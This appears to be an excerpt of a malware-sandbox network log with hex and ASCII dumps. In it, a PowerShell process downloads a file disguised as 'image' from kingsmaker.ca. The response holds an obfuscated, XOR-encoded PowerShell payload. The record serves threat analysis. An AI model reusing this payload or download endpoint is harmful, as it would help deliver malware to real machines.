                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: af c9 5e 67 ef b5 d6 dd 67 9f fb de bd 7b 9f 73 cf 7d fd 7d 13 aa ab aa ab 6b ca f8 c7 ff 8f 39 66 35 7c 02 3e 0d 88 02 58 f7 30 30 31 ee 62 61 62 60 62 63 63 e1 e0 3f 26 c4 c7 c3 c3 a7 23 a3 78 f8 98 95 81 fd 19 2b 03 0b 33 27 9f b4 10 e7 73 71 1e 66 16 61 b0 88 f8 6b 39 25 65 25 0e 21 cd b7 9a 0a 6f a4 15 95 e4 6f 2f 82 84 8d 8d 8d 8f 8b 4f 4b 48 48 2b cf cd c2 2d ff ff fa 05 6f 02 70 ef a2 4d a1 4c 22 23 51 01 77 70 91 90 71 91 e0 ad 00 25 00 20 a1 22 fd 7a 01 bf bd 90 ee 20 a3 a0 a2 a1 df 45 dc 34 e2 84 f2 07 c0 1d 24 64 e4 3b 28 c8 a8 a8 28 28 88 a3 5e 88 e3 00 0a 2e 2a de 13 76 11 34 7c c5 b7 e8 54 76 04 1c ef 22 bf dc a5 7e 59 f2 9d 50 69 70 9f 86 53 df de f7 1e 06 d1 43 e2 47 24 4f 69 e9 e8 19 18 b9 b8 9f f3 f0 be e0 13 7d 25 26 2e 21 29 25 ad ac
                                                                                                            Data Ascii: ^gg{s}}k9f5|>X001bab`bcc?&#x+3'sqfak9%e%!oo/OKHH+-opML"#Qwpq% "z E4$d;(((^.*v4|Tv"~YPipSCG$Oi}%&.!)%
                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: 44 34 5e 21 55 cb 97 43 fa 59 6f 38 af 73 6a b0 35 74 c7 58 06 c5 08 7e fc 67 d3 d6 ff 46 34 f6 1f d2 55 a5 d1 13 fa b2 42 c1 3d 3a b0 93 36 56 fe 48 f4 50 35 3f 1b be 45 4d e8 c8 38 d1 f3 12 29 14 e0 61 05 a5 ab 5f b2 c8 a6 3c e5 8d 79 90 8a a2 33 b7 ff 23 d9 17 2c 21 94 38 90 ce 51 33 38 a0 d3 7f 52 2c 72 80 16 63 04 79 cb 15 f7 8c 21 96 7e 32 4a a4 e5 0e 9a fb a5 07 38 f9 dc 72 f7 40 2c 11 37 a4 f7 b3 bb 53 d1 51 2b c9 4e 68 52 dd 98 7f cf b8 d2 17 b1 00 b6 f8 77 d4 64 97 6a 04 85 9d bb ce fa 2a f5 05 6e 2e 94 0b f7 0c 13 5b 9e db 30 7d ab c6 e6 61 ff b1 30 81 33 54 61 d1 b7 e3 64 65 d1 f2 7c cc 4e e7 3b e5 64 bc 96 e5 fd 67 13 b3 51 52 db de 36 b0 72 17 12 b9 4c a2 fc ec cc 65 8c cd e2 c8 f2 1a 5f be b1 b2 d5 84 95 4d 07 70 26 7d a5 50 68 1c 13 53 1b
                                                                                                            Data Ascii: D4^!UCYo8sj5tX~gF4UB=:6VHP5?EM8)a_<y3#,!8Q38R,rcy!~2J8r@,7SQ+NhRwdj*n.[0}a03Tade|N;dgQR6rLe_Mp&}PhS
                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: 2f 4f db 60 b0 c2 7f c6 bf 5c a5 e4 2a e4 97 a9 3c 78 fd 62 91 85 be 6b 2c 4e 4d f1 91 30 56 2d b3 2b 1c f0 b9 1a c3 de 4d 8b d2 24 1f 58 51 21 23 05 9b 08 fe 6e ec 9e 34 4f bb b2 a9 56 d4 c8 e4 d8 ec 44 19 5a 75 7d 97 fa 7e 2d 66 81 89 43 84 73 11 32 55 59 f2 1e e7 26 16 aa 3d a0 66 aa 1e 87 51 2a c7 a1 37 de d9 f9 f7 07 f2 16 93 fa fe da 87 72 65 7c 9d 99 49 69 7d 14 d6 21 95 23 38 80 74 9a 9f c0 68 51 43 0e 9d 7a 1e 55 c9 ce 84 df c0 30 42 21 ff 65 eb 95 75 de 0b ee d4 b5 ae 75 7a da a2 b0 bc d2 3a 45 84 ad ce 9e dd d8 73 5d 79 19 df 23 7e da f3 90 c8 da 1d f3 43 97 df b1 75 4a 21 e7 5f 5d ff 8f ec 87 06 b1 b8 76 09 8d 0e a1 fb 2c 47 1a 9b 70 c0 38 9a 8a a9 ad a9 5f b6 85 17 96 7e 90 7d 7e 7a 3d 6b 9e 6f 42 f1 da 39 28 b6 e3 2c f1 11 cc 37 2f 33 1f 0e
                                                                                                            Data Ascii: /O`\*<xbk,NM0V-+M$XQ!#n4OVDZu}~-fCs2UY&=fQ*7re|Ii}!#8thQCzU0B!euuz:Es]y#~CuJ!_]v,Gp8_~}~z=koB9(,7/3
                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: 70 e0 18 af 02 51 4d df e2 1f b0 c2 86 80 3a e9 ac 42 09 4c f5 61 ac 40 d5 62 97 92 1d 3b f9 fb 5f ef 2d c5 90 50 f1 a0 a3 87 b8 af e6 c1 81 df b7 8b bc a8 1a e4 ae 56 5a c8 37 ad 07 e8 b9 ab 75 70 00 86 5b 6f 01 7b 37 ec fd 32 68 24 4a 2a 83 20 e7 a5 9c b4 52 79 f8 6b d8 e4 50 e3 3a 9d 11 1c 80 8c 5f 9b fe fe 8d 45 17 9b e3 56 af 40 6a 7d a5 ab cb 9a f5 ee f9 d6 f5 46 6c 6c dc c3 6f 1f ac f4 cd 0c a9 f9 c1 45 4c a0 02 e9 d3 92 c1 13 7a cd eb 29 cf 70 cd df 7f d6 7c 86 53 cc 0e af db 86 51 86 d4 d1 f1 4d 13 8c aa 2e fd af 5f 5f 8f df 5c 31 ac e9 ea 3c 86 f9 69 ea 85 b2 f7 8a 75 3a 6b c7 e5 d8 c7 4d 69 b9 5e f5 b5 e2 97 04 4b ae 5d 70 c0 ce a8 dc 8b 45 3d df 5c ed 8d 9f ef fd ad 8e 2d a9 9b 6f 99 90 01 b9 6e 18 1c 28 3e 1f 8f 9a 87 74 dc 74 dc 38 d9 ac 9a
                                                                                                            Data Ascii: pQM:BLa@b;_-PVZ7up[o{72h$J* RykP:_EV@j}FlloELz)p|SQM.__\1<iu:kMi^K]pE=\-on(>tt8
                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: a5 08 d9 67 10 29 3b 11 34 86 d2 17 a5 f7 fe 5f 48 fe fe 01 e9 43 03 ff 8e 46 d4 5b fc 5b ac 56 57 46 db 35 3c 88 22 0b f9 a7 77 66 f8 71 d2 73 38 70 9e 56 85 80 3d 2a a6 d1 63 41 25 41 bd d7 61 9b 02 68 20 e6 e0 9b 31 72 31 87 64 9e 41 cf 2d 95 51 96 e8 b3 48 7a 7c 80 af d8 f8 1a 14 37 84 18 b7 18 16 12 92 23 1d 09 1d db df 16 8c 28 92 43 cf 21 cc c3 c1 8e d9 26 5f 55 64 f0 65 92 f9 d3 f3 fe 3e ab 28 ea 5e c4 45 17 f6 f1 8b b0 06 a3 40 6a 46 db cf 6d 60 e2 4c 38 97 db 65 08 ff 49 e8 19 18 00 07 5c 20 9c a3 36 8d 4b cd 4b b0 6a 9e 43 ee c5 93 9d 87 f3 07 0b 76 08 8f 9e 78 41 72 e0 5e 20 b7 1e 82 36 24 08 11 46 e0 11 5a 0a 1c d0 dd 40 58 20 74 a0 98 be f2 40 bc dc ca 86 ec c1 dc 4e 18 37 46 fe ca 93 26 72 3e 68 34 0c 6f c7 03 06 81 03 87 f7 21 d7 b2 4a ad
                                                                                                            Data Ascii: g);4_HCF[[VWF5<"wfqs8pV=*cA%Aah 1r1dA-QHz|7#(C!&_Ude>(^E@jFm`L8eI\ 6KKjCvxAr^ 6$FZ@X t@N7F&r>h4o!J
                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: bf 6f fa 3d 4f 54 04 e4 ee dd 54 d8 6c 68 8f 40 3e c0 4c be 40 61 77 2e c8 9f da cf 3d db 3f 7e a8 a6 34 3f d5 8e b7 f9 a4 fe 34 c4 0d ca b7 36 3f 57 93 20 ae d0 a5 1a 20 42 4c 55 93 49 f8 d4 d8 ad 6c 93 cf 5e 49 22 44 63 56 c6 c8 8d 70 04 2b 88 ea 4d cb 35 d3 c4 8e 89 4c be 7a 11 f5 55 54 aa d3 25 6e c2 41 10 d8 b0 c8 67 cd 02 57 37 7b 01 dd 4c 80 dd 50 2b 47 8d d2 47 1f fd b0 c8 92 7f 34 7d a0 a3 8d 37 97 c2 e6 df 73 e4 be e3 a0 65 fe 1c c8 78 4f ca 25 6e d1 59 93 de 21 2b 1c 98 36 86 7d cc 41 74 ed 75 57 1b 04 c9 33 2c aa 9a ed 03 0f 4c 2d 09 0b 4a 99 e0 3c 33 bf 5b 8c e0 48 94 31 4e e5 2b ba 2c 8d 57 90 0f ac 8f e4 0c de 5f 48 1d 93 43 b4 c7 46 57 4c 2f 3f 7f e2 f3 1c 65 9b 30 09 70 2c c9 df ec b6 a1 f5 cc 14 77 a1 fe da 8e be 29 66 2c 8f 39 3d 23 85
                                                                                                            Data Ascii: o=OTTlh@>L@aw.=?~4?46?W BLUIl^I"DcVp+M5LzUT%nAgW7{LP+GG4}7sexO%nY!+6}AtuW3,L-J<3[H1N+,W_HCFWL/?e0p,w)f,9=#
                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: b9 01 6c 01 66 fc ad e5 fa f5 34 e5 3e 9b 72 d4 41 5f d0 a9 4c e3 0e a9 63 2b 7e ca 1c d2 35 db 16 a2 93 f8 7a 87 4e a2 d1 42 21 99 7d 52 50 d3 1f 1f e0 80 53 bd 50 e0 c5 8d c5 70 b1 d5 93 86 6f b1 63 0b 2e 12 8c 3b d4 97 37 16 9d 27 3a 42 56 6c 0a b1 43 90 ba c0 80 ed 96 92 6c 35 56 bc 55 1d b1 80 9c bc 96 28 ad b4 a4 df 82 10 ad f9 d3 08 fe ab d6 28 22 8f 35 12 02 99 bc 08 4b 83 32 e5 1c 85 53 fc de df 4c 7f 3f 2d 99 3b 7f 69 a1 e1 bd 5c b4 e9 55 8a ce dd ba 95 72 48 3e 02 da 5a 95 bf b9 3b ee f1 93 ed e2 21 64 e7 1b 44 7a 29 f3 5a e2 48 50 5b b9 1c 65 3c 72 6d be 71 e8 04 b4 db 6f c1 b6 99 55 0b 22 de b2 eb 5e b8 52 df 49 4c fc 49 16 72 2c 32 e2 ed e9 8d f6 ad 0e 92 ed 46 f2 d1 a5 b3 f1 69 d7 42 c9 cd 01 8c 9a 32 b2 48 35 69 52 55 23 e8 ee b3 d4 64 3f
                                                                                                            Data Ascii: lf4>rA_Lc+~5zNB!}RPSPpoc.;7':BVlCl5VU(("5K2SL?-;i\UrH>Z;!dDz)ZHP[e<rmqoU"^RILIr,2FiB2H5iRU#d?
                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: a5 45 99 06 44 99 d9 bd 66 3c b3 91 76 29 bb c9 1d fb dc 6b 12 df 6b 7e ea a3 d6 3c c0 51 64 3c ba 1c cf 1e 7c b5 21 ee e1 cf fc 6a 83 e9 55 ef fe e5 26 ee 86 62 4b 9e 44 85 6b 83 f0 b4 9f b5 e2 c0 c1 7c e5 82 a6 8a a2 5a 4c 4c 88 e1 45 a2 31 6d e5 42 30 b9 76 bc dc 9b 6a 38 90 9c c3 77 23 e1 be 6c 5d 87 9b ff b2 a3 f3 d0 fa 61 09 78 0a 42 ad 1b 2d f6 2a 57 5c 33 71 b8 75 24 ab 20 39 30 ae 03 d1 8a d3 58 e6 91 e1 6a 31 90 2f dc f5 99 ae 44 f4 49 46 a3 74 f8 b8 fd 31 14 2f 61 74 b9 37 4c a5 69 59 5c 8f a1 c9 1c 05 31 15 a4 64 66 04 16 64 92 39 d0 db 48 05 86 13 81 5a 07 c3 2a 64 df df 42 6f 26 10 06 c3 d8 73 64 92 b2 74 d4 d2 d2 f2 41 29 29 22 45 a7 ce cd 3f 56 b3 cd 24 e6 4f 77 af 0a 1a 55 8b 50 43 0f e6 42 2e 98 ca 88 5d 10 9b 91 58 a1 f9 c9 71 86 02 6b
                                                                                                            Data Ascii: EDf<v)kk~<Qd<|!jU&bKDk|ZLLE1mB0vj8w#l]axB-*W\3qu$ 90Xj1/DIFt1/at7LiY\1dfd9HZ*dBo&sdtA))"E?V$OwUPCB.]Xqk
                                                                                                            2024-11-29 08:09:07 UTC1369INData Raw: 70 76 95 a0 b3 e5 71 2d 94 c1 99 e9 0e 01 66 92 17 2a 7c cf 76 ef 76 72 21 3d fd 45 dc 54 78 e2 14 26 26 7b 5d ec af 9e f8 63 d6 ba 03 9c c2 f8 8a da 2e bf bb 12 1c f0 8f 5b 28 be d8 72 80 03 de b2 80 33 97 9a da bb 45 72 50 eb b3 ee e7 09 43 1c 2f bf 6b b9 5b 2d 87 8c 15 02 04 e0 7b 70 00 13 2c 02 07 52 64 65 60 37 1d 70 a0 6d f0 cf 3b 06 d0 5d c4 6c 53 f6 cb 1d 29 2f 8e 47 1a f7 66 20 d7 3a 2f bc 19 4d 51 7e 4e 9b 33 ed ea cb c3 58 7d f8 13 98 e2 4a ce df 2d e4 b7 df 3b 5d 42 a6 f0 75 ed 0a ef cf de d2 61 46 68 6f 19 66 3c 9a 92 af 5d 35 cf de 78 bf 57 40 5e ff b7 11 5c a0 03 69 e3 03 07 66 04 08 8a 4b 21 f7 60 32 a6 59 f3 92 f7 1a 42 9a bb f7 c7 af 4f 10 ae be 91 d6 87 9f 84 29 ec 0f b5 70 1a e8 8a 6e 21 1b 7c 66 ba ac d0 d5 52 45 fd 78 e0 b7 cb 55 cb
                                                                                                            Data Ascii: pvq-f*|vvr!=ETx&&{]c.[(r3ErPC/k[-{p,Rde`7pm;]lS)/Gf :/MQ~N3X}J-;]BuaFhof<]5xW@^\ifK!`2YBO)pn!|fRExU


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.11.3049744172.67.179.674435936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:11 UTC388OUTGET /file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-29 08:09:11 UTC1112INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:11 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 12110
                                                                                                            Connection: close
                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jul7%2FxQYzaos%2B81twFNMe%2BZUZlPaupWK%2FRrU0r2IbzblaQmacwPjQp9c7LNQX0pu8tAU8AYhq1ne49ovy0ehGdBTMA9bgjsgrr6oYj7m2E5TScup9vn97p61n4Z%2BQY8J0rRDmffCQBEi"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2351&min_rtt=1180&rtt_var=116&sent=498&recv=242&lost=0&retrans=0&sent_bytes=700006&recv_bytes=3741&delivery_rate=39681349&cwnd=275&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d35ca1a0adb-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158900&min_rtt=158777&rtt_var=33593&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=24117&cwnd=252&unsent_bytes=0&cid=346d9e73a78f4a6d&ts=711&x=0"
                                                                                                            2024-11-29 08:09:11 UTC257INData Raw: 25 78 6d 6b 78 62 6e 6f 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 56 6c 79 68 63 57 4b 72 58 33 6d 4b 5b 33 5b 53 4c 44 75 44 54 56 38 70 52 54 57 4e 63 30 71 59 55 6f 4b 4b 53 33 79 75 52 54 65 46 65 56 57 55 50 6f 5b 6a 53 33 69 72 58 33 6d 42 60 46 4b 74 54 6f 43 6a 63 56 79 34 5b 47 69 4f 5b 33 4c 78 4e 56 30 6a 52 46 53 6e 58 33 30 57 5b 33 47 58 55 56 65 69 57 7b 57 37 5b 44 65 46 62 33 4b 49 57 6c 75 44 54 56 38 73 58 6b 4f 52 63 30 71 58 52 6a 4b 68 63 6d 4b 76 5b 46 30 72 64 56 53 58 55 56 65 50 54 31 4b 48 56 6d 69 53 65 47 58 78 4c 59 43 54 4c 6a 71 79 56 6d
                                                                                                            Data Ascii: %xmkxbno<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#VlyhcWKrX3mK[3[SLDuDTV8pRTWNc0qYUoKKS3yuRTeFeVWUPo[jS3irX3mB`FKtToCjcVy4[GiO[3LxNV0jRFSnX30W[3GXUVeiW{W7[DeFb3KIWluDTV8sXkORc0qXRjKhcmKv[F0rdVSXUVePT1KHVmiSeGXxLYCTLjqyVm
                                                                                                            2024-11-29 08:09:11 UTC1369INData Raw: 4c 44 6d 45 4c 54 38 5b 57 7b 47 72 58 7b 4f 42 60 47 6a 78 57 56 65 4b 63 44 71 33 58 6b 4f 52 58 30 54 78 57 6c 71 6a 56 44 71 76 5b 44 69 72 53 47 71 59 4f 55 43 60 56 44 6d 34 52 56 6d 43 65 47 44 78 64 46 69 6b 4c 31 30 6f 52 56 75 46 65 56 53 49 63 45 4b 69 56 44 6e 79 58 7b 47 42 64 56 48 78 54 6b 47 5b 4c 30 47 71 52 54 69 32 5b 30 58 78 60 46 79 6b 63 57 57 31 57 45 4b 4a 62 57 71 59 55 6b 43 4b 52 49 4f 6f 52 6a 58 35 65 57 71 49 63 49 71 6b 53 32 69 6e 5b 57 54 30 60 46 4b 59 57 56 65 4c 57 7b 57 72 52 54 4f 4a 56 46 47 59 4f 56 75 68 4c 33 53 37 52 54 57 52 63 47 71 75 57 6f 57 60 53 30 5b 34 52 56 6d 42 4e 54 53 53 63 33 75 69 56 44 34 55 5b 47 62 30 65 56 47 59 4f 56 34 4b 53 45 43 6f 52 6a 65 60 60 46 4b 48 55 6c 79 51 65 7b 43 4d 58 57 65
                                                                                                            Data Ascii: LDmELT8[W{GrX{OB`GjxWVeKcDq3XkORX0TxWlqjVDqv[DirSGqYOUC`VDm4RVmCeGDxdFikL10oRVuFeVSIcEKiVDnyX{GBdVHxTkG[L0GqRTi2[0Xx`FykcWW1WEKJbWqYUkCKRIOoRjX5eWqIcIqkS2in[WT0`FKYWVeLW{WrRTOJVFGYOVuhL3S7RTWRcGquWoW`S0[4RVmBNTSSc3uiVD4U[Gb0eVGYOV4KSECoRje``FKHUlyQe{CMXWe
                                                                                                            2024-11-29 08:09:11 UTC1369INData Raw: 6c 76 76 56 6d 69 4f 63 31 71 47 63 49 57 6b 52 47 58 76 54 6c 30 72 62 30 71 56 50 6c 69 6a 53 33 65 76 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6a 4b 6b 52 44 4b 7b 5b 57 4f 42 56 57 50 79 52 56 65 60 57 7b 57 70 58 33 34 72 65 33 53 49 63 49 5b 68 60 55 6d 73 56 6d 65 4e 64 56 57 58 50 6b 43 69 57 7b 6d 30 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 60 65 6c 4f 71 50 56 38 4a 53 33 75 6f 54 47 4f 43 65 31 38 34 50 56 75 69 54 31 47 31 58 6a 69 53 5b 31 71 49 56 6f 43 68 53 30 5b 45 5b 57 69 52 63 46 4f 34 4f 54 30 60 57 7b 57 74 5b 44 65 6f 4f 31 6d 45 54 6f 43 4d 64 59 4f 76 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 30 4b 75 58 57 65 35 63 47 47 74 63 45 43 60
                                                                                                            Data Ascii: lvvVmiOc1qGcIWkRGXvTl0rb0qVPlijS3evSGGwUjOqPVeKP1GoRTOC[1m4PjKkRDK{[WOBVWPyRVe`W{WpX34re3SIcI[h`UmsVmeNdVWXPkCiW{m0SGGw[1mEPVeKP1GoRTe`elOqPV8JS3uoTGOCe184PVuiT1G1XjiS[1qIVoChS0[E[WiRcFO4OT0`W{Wt[DeoO1mEToCMdYOvRTi{UjOqPVeKP1GoRTOC[1mEPVeKP0KuXWe5cGGtcEC`
                                                                                                            2024-11-29 08:09:11 UTC1369INData Raw: 53 45 50 55 6d 4b 53 44 47 4e 50 33 6d 43 5b 31 6d 45 50 56 75 60 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 6d 53 6a 57 31 34 70 56 6d 65 56 60 30 71 59 54 56 65 50 54 31 47 73 56 6c 30 46 62 33 4c 78 57 54 34 45 60 54 47 6f 52 54 4f 43 60 33 53 49 57 6f 53 6b 53 57 71 76 58 6a 65 57 5b 30 43 55 50 56 6d 53 64 6f 43 6b 57 6b 4b 72 65 57 71 49 4e 55 4f 6b 4c 59 69 57 56 6d 62 79 65 30 69 49 56 6f 43 68 53 30 57 71 55 32 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 5b 45 4b 6e 62 46 4b 49 57 56 65 4d 50 30 4b 34 56 6d 69 52 64 56 57 57 55 6f 5b 6a 57 7b 54 76 52 54 4c 79 62 33 53 45 50 56 75 68 57 31 58 31 57 56 30 56 4c 46 4f 75 63 46 79 6b 64 54 47 31 56 57 62 30 60 31 6d 45 4c 59 57 68 4c 30 47 6f 52 6a 65 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 57 55 4f 56 60
                                                                                                            Data Ascii: SEPUmKSDGNP3mC[1mEPVu`S{j{Xl05emmYTmSjW14pVmeV`0qYTVePT1GsVl0Fb3LxWT4E`TGoRTOC`3SIWoSkSWqvXjeW[0CUPVmSdoCkWkKreWqINUOkLYiWVmbye0iIVoChS0WqU2bvR1SSc3eKP1Go[EKnbFKIWVeMP0K4VmiRdVWWUo[jW{TvRTLyb3SEPVuhW1X1WV0VLFOucFykdTG1VWb0`1mELYWhL0GoRjeRelPxOYOhLj[sWUOV`
                                                                                                            2024-11-29 08:09:11 UTC1369INData Raw: 70 56 55 4b 56 64 6c 4c 78 56 6b 47 68 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 47 59 56 56 65 4d 53 6d 4b 72 58 7b 4f 53 65 47 57 49 53 6b 43 69 50 31 47 31 57 54 65 46 4c 46 47 45 50 56 75 6a 53 30 5b 31 58 31 57 60 62 46 4b 49 57 56 65 4c 57 6a 4b 6e 5b 44 65 6e 57 56 57 58 50 6c 79 4b 53 59 69 72 56 57 65 5b 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 5b 57 60 30 4b 4a 54 6a 5b 52 54 47 57 47 56 6a 71 4b 50 31 71 47 58 6b 4f 6a 65 56 4b 49 4e 56 69 60 50 31 4b 70 58 6b 48 79 65 33 4b 49 57 6b 43 60 57 30 44 33 52 54 4f 52 4c 47 71 59 4c 59 65 52 63 56 79 7b 56 6d 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31
                                                                                                            Data Ascii: pVUKVdlLxVkGhPUCMRTOC[1mEPVeKP1GoRTOC[3GYVVeMSmKrX{OSeGWISkCiP1G1WTeFLFGEPVujS0[1X1W`bFKIWVeLWjKn[DenWVWXPlyKSYirVWe[bDmHb14E`TGoRTOC[1mEPVeKP1GoRTOC[1mEPm[W`0KJTj[RTGWGVjqKP1qGXkOjeVKINVi`P1KpXkHye3KIWkC`W0D3RTORLGqYLYeRcVy{VmOKO1SSc3eKP1GoRTOC[1mEPVeKP1
                                                                                                            2024-11-29 08:09:11 UTC625INData Raw: 57 6c 75 4c 50 31 4b 76 58 6c 30 4e 64 57 71 59 4c 56 79 68 63 6d 47 6f 5b 44 65 6e 63 44 6d 48 52 6c 79 6a 52 44 6e 30 52 54 65 4e 65 6c 53 59 4f 55 43 4b 53 31 5b 30 56 6a 4f 42 4c 30 6d 59 63 45 43 4b 53 31 71 72 56 6c 31 34 64 57 71 55 50 6f 6d 60 56 47 4b 34 5b 57 65 72 65 57 71 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6f 43 60 60 54 47 77 55 47 62 30 65 6c 53 45 50 56 75 60 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 6d 53 6a 57 31 34 70 56 6d 65 56 60 30 71 59 54 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6f 6d 60 56 47 4b 34 5b 57 57 4e 65 6c 53 59 4f 55 43 4d 64 59 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 49 63 46 30 4b 50 33 65 73 58 33 30 56 4c 46 4f
                                                                                                            Data Ascii: WluLP1KvXl0NdWqYLVyhcmGo[DencDmHRlyjRDn0RTeNelSYOUCKS1[0VjOBL0mYcECKS1qrVl14dWqUPom`VGK4[WereWq2LDuKP1GoRTOC[1mEPoC``TGwUGb0elSEPVu`S{j{Xl05emmYTmSjW14pVmeV`0qYTYCKRIONP3mC[1mEPVeKP1GoRTOC[1mETom`VGK4[WWNelSYOUCMdYONP3mC[1mEPVeKP1GoRTOC[1mIcF0KP3esX30VLFO
                                                                                                            2024-11-29 08:09:11 UTC1369INData Raw: 6f 43 60 60 54 47 77 55 47 62 30 65 6c 53 45 50 56 75 60 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 6d 53 6a 57 31 34 70 56 6d 65 56 60 30 71 59 54 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 6d 5b 4a 53 57 4f 57 54 6d 57 54 4c 54 4b 49 54 30 4f 43 60 57 4b 49 4e 55 4f 68 63 59 69 33 56 57 65 53 5b 30 71 75 53 6f 43 68 53 30 5b 73 52 54 65 46 63 56 53 49 57 6f 6d 4b 50 30 4b 31 56 57 69 6e 54 30 71 58 54 6f 6d 69 57 30 5b 37 52 54 69 4a 63 46 53 48 52 6f 43 60 56 44 30 30 52 56 62 76 52 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 35 76 55 6a 4f 72 57 6d 4f 52 53 56 79 47 57 6a 54 34 54 57 4b 73 60 33 65 4b 63 44 34 7b 56 6d 65 56 65 31 6d 44 53 59 65 6b 64 54 6a 32 53 47 47 76 57 46 53 49 53 6f 6d 6a 50 7b 47 54 58 6a 65 56 63 46 4f 45
                                                                                                            Data Ascii: oC``TGwUGb0elSEPVu`S{j{Xl05emmYTmSjW14pVmeV`0qYTYCKRIONP3mC[1mEPVeKP1GoWm[JSWOWTmWTLTKIT0OC`WKINUOhcYi3VWeS[0quSoChS0[sRTeFcVSIWomKP0K1VWinT0qXTomiW0[7RTiJcFSHRoC`VD00RVbvR1mEPVeKRECNP35vUjOrWmORSVyGWjT4TWKs`3eKcD4{VmeVe1mDSYekdTj2SGGvWFSISomjP{GTXjeVcFOE
                                                                                                            2024-11-29 08:09:11 UTC1369INData Raw: 4b 56 4c 46 53 49 63 49 57 60 4c 31 34 54 56 6d 69 53 5b 31 79 57 53 6f 4f 68 53 7b 6a 7b 57 55 4f 52 60 46 4f 74 54 6a 71 60 60 7b 6d 30 54 56 30 46 4c 46 53 49 57 6f 6d 69 57 30 5b 37 52 54 4c 79 53 56 48 78 4f 55 43 57 4c 30 4b 33 58 31 57 72 63 57 48 78 4e 59 43 68 63 56 53 50 58 6c 75 4a 60 46 53 48 54 6c 79 6b 63 56 79 72 58 32 71 7b 55 6a 4f 72 57 6f 57 6b 63 57 5b 74 58 57 69 4e 4c 47 71 58 52 59 53 57 4c 6a 34 77 56 6d 65 52 4c 56 4b 49 57 6c 75 56 53 31 5b 37 58 59 6d 43 65 47 5b 49 53 6f 71 69 4c 45 57 6e 58 6d 65 57 5b 31 6d 74 62 47 53 60 56 44 6e 78 58 57 65 4e 63 47 6a 78 53 6f 4b 68 4c 6c 72 7b 52 56 6d 43 65 47 44 78 4e 59 57 60 63 56 79 34 58 6d 53 77 60 30 71 75 53 6f 4f 6b 4c 6d 54 32 53 47 47 76 54 30 71 59 5b 49 43 6b 4c 30 4b 72 58
